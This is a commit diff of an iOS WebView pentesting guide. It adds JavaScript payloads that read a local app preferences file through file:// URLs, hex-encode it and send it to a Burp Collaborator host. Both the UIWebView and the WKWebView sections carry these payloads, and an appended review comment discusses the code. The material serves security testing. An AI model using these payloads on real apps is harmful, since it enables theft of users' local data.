GitBook: [master] one page modified
This commit is contained in:
parent
d38dd12c95
commit
418360ab5c
|
@ -174,6 +174,34 @@ $ rabin2 -zz ./WheresMyBrowser | grep -i "loadHTMLString"
|
|||
* File access from `file://` URLs is always enabled.
|
||||
* Universal access from `file://` URLs is always enabled.
|
||||
* If you retrieve the effective origin from a `UIWebView` where `baseURL` is also set to `nil` you will see that it is **not set to "null"**, instead you'll obtain something similar to the following: `applewebdata://5361016c-f4a0-4305-816b-65411fc1d78`0. This origin "applewebdata://" is similar to the "file://" origin as it **does not implement Same-Origin Policy** and allow access to local files and any web resources.
|
||||
|
||||
{% tabs %}
|
||||
{% tab title="exfiltrate\_file" %}
|
||||
```javascript
|
||||
String.prototype.hexEncode = function(){
|
||||
var hex, i;
|
||||
var result = "";
|
||||
for (i=0; i<this.length; i++) {
|
||||
hex = this.charCodeAt(i).toString(16);
|
||||
result += ("000"+hex).slice(-4);
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.onreadystatechange = function() {
|
||||
if (xhr.readyState == XMLHttpRequest.DONE) {
|
||||
var xhr2 = new XMLHttpRequest();
|
||||
xhr2.open('GET', 'http://187e2gd0zxunzmb5vlowsz4j1a70vp.burpcollaborator.net/'+xhr.responseText.hexEncode(), true);
|
||||
xhr2.send(null);
|
||||
}
|
||||
}
|
||||
xhr.open('GET', 'file:///var/mobile/Containers/Data/Application/ED4E0AD8-F7F7-4078-93CC-C350465048A5/Library/Preferences/com.authenticationfailure.WheresMyBrowser.plist', true);
|
||||
xhr.send(null);
|
||||
```
|
||||
{% endtab %}
|
||||
{% endtabs %}
|
||||
|
||||
* **WKWebView**:
|
||||
* **`allowFileAccessFromFileURLs`** \(`WKPreferences`, `false` by default\): it enables JavaScript running in the context of a `file://` scheme URL to access content from other `file://` scheme URLs.
|
||||
* **`allowUniversalAccessFromFileURLs`** \(`WKWebViewConfiguration`, `false` by default\): it enables JavaScript running in the context of a `file://` scheme URL to access content from any origin.
|
||||
|
@ -214,11 +242,23 @@ allowUniversalAccessFromFileURLs: 0
|
|||
#### Exfiltrate arbitrary files
|
||||
|
||||
```javascript
|
||||
//For some reason this payload doesn't work!!
|
||||
//Let me know if you know how to exfiltrate local files from a WKWebView
|
||||
String.prototype.hexEncode = function(){
|
||||
var hex, i;
|
||||
var result = "";
|
||||
for (i=0; i<this.length; i++) {
|
||||
hex = this.charCodeAt(i).toString(16);
|
||||
result += ("000"+hex).slice(-4);
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.onreadystatechange = function() {
|
||||
if (xhr.readyState == XMLHttpRequest.DONE) {
|
||||
var xhr2 = new XMLHttpRequest();
|
||||
xhr2.open('GET', 'http://187e2gd0zxunzmb5vlowsz4j1a70vp.burpcollaborator.net/'+btoa(), true);
|
||||
xhr2.open('GET', 'http://187e2gd0zxunzmb5vlowsz4j1a70vp.burpcollaborator.net/'+xhr.responseText.hexEncode(), true);
|
||||
xhr2.send(null);
|
||||
}
|
||||
}
|
||||
|
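Review bot: The `//For some reason this payload doesn't work!!` / `//Let me know ...` comments in the second hunk leave out the explanation the same section already supplies: the WKWebView flags `allowFileAccessFromFileURLs` and `allowUniversalAccessFromFileURLs` default to `false` (and the hunk header shows `allowUniversalAccessFromFileURLs: 0` for this app), so a `file://` read being refused is presumably the control working, not a mystery; suggest replacing the two comment lines with `// Expected to fail while the WKWebView keeps allowFileAccessFromFileURLs / allowUniversalAccessFromFileURLs at their default false; the UIWebView variant above works only because file access from file:// is always enabled there`. The `xhr2.open(... + btoa(), true)` line directly above the `hexEncode()` variant looks like a leftover from the previous revision; if it is still on the new side, `btoa()` without an argument throws before the second `open`, which by itself would explain the "doesn't work" — worth confirming which side it belongs to, and the fenced block continues past the end of this hunk. In both hunks `String.prototype.hexEncode` extends a native prototype and mixes `var`, `==` and a missing semicolon on `return result`; a plain `const hexEncode = (s) => [...s].map((c) => c.charCodeAt(0).toString(16).padStart(4, '0')).join('');` helper would read the same without touching `String.prototype`. The text should also state that the encoder emits four hex digits per UTF-16 code unit, since that is what a reader needs to decode the collaborator hits.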
|